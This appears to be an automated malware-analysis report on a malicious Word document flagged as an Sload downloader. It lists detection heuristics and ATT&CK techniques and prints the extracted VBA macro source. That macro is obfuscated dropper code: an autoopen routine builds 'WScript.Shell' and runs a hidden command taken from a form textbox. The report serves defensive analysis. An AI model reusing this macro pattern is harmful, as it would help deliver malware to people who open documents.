MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros that leverage WScript.Shell and CreateObject to execute code, indicating a downloader or dropper functionality. The presence of an autoopen macro suggests automatic execution upon opening the document. ClamAV also identified this as a downloader.
Heuristics 9
-
ClamAV: Doc.Downloader.Sload-6817537-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6817537-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set ArubanGuilderid = virtualsz calculateva = "WscRipt.sHeLl" Set Woodenow = schemasja -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Rubberwo = Lightvo Operationsot = Array(Tuvaluro, ivorysc, Georgiazb, CreateObject("" + interfacefz + Strategistjb + olivehz + Boliviaav + Mountainstj + calculateva).Run!(("" + paymentko + Concretecc + THXnw + Squaretl + Manoraq.TextBox1) + Harborspv + securedlinedv + schemaszl, 50 - 50), Internalqs, BulgarianLevfa, Bangladeshzu) Set Pinewj = Factorsjv -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() multibyteii = Avonvf -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7911 bytes |
SHA-256: eb4a4396cbec9af2ea6d485b81f2006368990eaf0f67cc3406699a6e21eeaedf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Manoraq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "panelcs"
Function marketsqz()
On Error Resume Next
Set Granitenm = Optimizationjt
Set Directpa = Burgskq
Select Case bluecq
Case 726
contentrw = Streetlb
NorwegianKroneom = CLng(58)
Case 248
CheckingAccountlr = CLng(478)
paymentrn = CDate(pinkdh)
Dobrajz = Int(751)
Case 198
realtimeww = Cos(Gorgeousiw)
PracticalFreshHatia = ChrB(560)
Avonaf = hackingqp
End Select
Set Indianaau = arraynq
Set Mexicokc = ElectronicsClothingva
Set Woodenzi = Customermd
Select Case auxiliarykw
Case 866
impactfullu = projectfj
collaborationii = CLng(719)
Case 553
Villagetd = CLng(784)
magentaqi = CDate(Amelioratedft)
Plannerzh = Int(23)
Case 561
optimaliz = Cos(calculatingqq)
neuralws = ChrB(156)
Districtwa = Interactionspj
End Select
Set Brookua = Wisconsinhp
Set withdrawalpw = neuralfu
Set purplewi = verticalaj
Select Case holisticvc
Case 488
opensourcekr = Principalnm
zerotolerancewm = CLng(684)
Case 647
Arizonarm = CLng(365)
disintermediatetl = CDate(hierarchyqa)
alarmjq = Int(812)
Case 438
withdrawalki = Cos(Mountainstr)
Healthwb = ChrB(716)
Berkshireuw = AutoLoanAccountmz
End Select
Set ArubanGuilderid = virtualsz
calculateva = "WscRipt.sHeLl"
Set Woodenow = schemasja
Set richno = Pointns
Select Case Knollpl
Case 516
conglomerationlj = backuprw
Refinedst = CLng(422)
Case 62
Marylandit = CLng(474)
morphjf = CDate(HomeLoanAccountmz)
TastyPlasticChickenha = Int(139)
Case 965
Buckinghamshirewc = Cos(Musicts)
navigatingjv = ChrB(830)
magentazb = auxiliarycr
End Select
Set Rubberwo = Lightvo
Operationsot = Array(Tuvaluro, ivorysc, Georgiazb, CreateObject("" + interfacefz + Strategistjb + olivehz + Boliviaav + Mountainstj + calculateva).Run!(("" + paymentko + Concretecc + THXnw + Squaretl + Manoraq.TextBox1) + Harborspv + securedlinedv + schemaszl, 50 - 50), Internalqs, BulgarianLevfa, Bangladeshzu)
Set Pinewj = Factorsjv
Set Kansasvr = communitieskz
Select Case Berkshirehw
Case 59
tealam = JSONqj
Coordinatordu = CLng(782)
Case 861
panelhl = CLng(281)
fullrangelr = CDate(Islandpc)
Routebs = Int(499)
Case 737
Louisianacw = Cos(onetoonebp)
B2Bjr = ChrB(873)
virtualom = Rubberzl
End Select
Set Sharableah = JBODpi
Set missioncriticalwk = Lesothocj
Set Configurationcp = Plasticmb
Select Case Architectsi
Case 785
SingaporeDollarwi = withdrawaldp
bypassingrb = CLng(52)
Case 859
connectow = CLng(214)
uniformbs = CDate(onetoonewz)
Concreteto = Int(222)
Case 193
focusgroupiw = Cos(Skywayiw)
Metalwl = ChrB(532)
dynamictw = Ouguiyamu
End Select
Set growub = Generican
Set Gardenszb = Mobilityam
Set Concretekt = Concretekn
Select Case reinventpv
Case 781
Directivesws = Dynamiclj
RefinedSteelBikehl = CLng(138)
Case 759
USDollarsz = CLng(993)
Rwandaqa = CDate(JSONaj)
copyzm = Int(432)
Case 348
transmitla = Cos(ClothingBooksGardenip)
opticaldc = ChrB(326)
Fantasticaj = synthesizeqd
End Select
Set BabyKidsMusicbq = supplychainszo
End Function
Attribute VB_Name = "Borderslw"
Function analyzingoi()
Keybp = Qualityuk
Managerpw = plumkt
paymentjj = circuitld
Woodenjq = IncredibleConcreteSoapis
evenkeeledfj = pinkif
Plasticbs = Gamesat
clicksandmortarlf = SmallMetalTunahw
motivatingfn = programkc
Inletso = meshhj
Alabamaif = calculatest
redundantsh = fullrangeiw
indexun = copyingvz
End Function
Function Humando()
demanddrivenut = CreditCardAccounttj
SDDqt = generatingfu
Borderswq = Gorgeouscs
indexinghr = arrayzj
MoneyMarketAccountuw = Forwardzb
withdrawalbk = opensourcein
limemd = XSSaf
Reverseengineeredkq = GorgeousSoftShirtim
targetda = PersonalLoanAccountzl
Bedfordshirelo = capacitorci
Dominicacd = Nevadajd
SouthDakotalt = Metalid
End Function
Sub autoopen()
multibyteii = Avonvf
Universalzh = Principalns
Avonfd = Triplebufferedof
bricksandclickszd = revolutionizezz
Kazakhstantd = LicensedGraniteChickenkd
calculatecw = HandcraftedFreshComputerbr
Metaltm = Array(ErgonomicFreshSoapdu, Intranethz, multibyteiv, marketsqz, turquoisequ, Portsif, Hollowfd)
LicensedRubberCheesefc = SMSci
Shoeswq = capabilityij
Licensedtf = bypassingtc
Bermudawr = transmittz
auxiliaryzh = ErgonomicSoftCheesewd
backupis = Functionalityru
End Sub
Function Fordsf()
overridingpq = Parkwaytr
analyzingsz = GorgeousCottonTunavd
Beautyjh = Throughwaypj
rebootdh = NorthernMarianaIslandslj
engineerqu = quantifyingju
customizedvf = circuitaz
Clothingtj = Refinedss
Steelsz = standardizationbi
morphbd = redundantsu
AwesomeCottonKeyboardwj = Assistantwn
Iowabc = Leadrl
Fantasticji = Fordtz
End Function
Attribute VB_Name = "Brookbj"
Attribute VB_Name = "Commonvw"
Attribute VB_Name = "Patacamw"
Attribute VB_Name = "greenzw"
Attribute VB_Name = "HandmadeRubberMousezr"
Attribute VB_Name = "turquoiseqo"
Attribute VB_Name = "TastyCottonTunaad"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "programcm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "datawarehousefo"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "supplychainsiz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "streamlinepj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AwesomeWoodenCarsp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.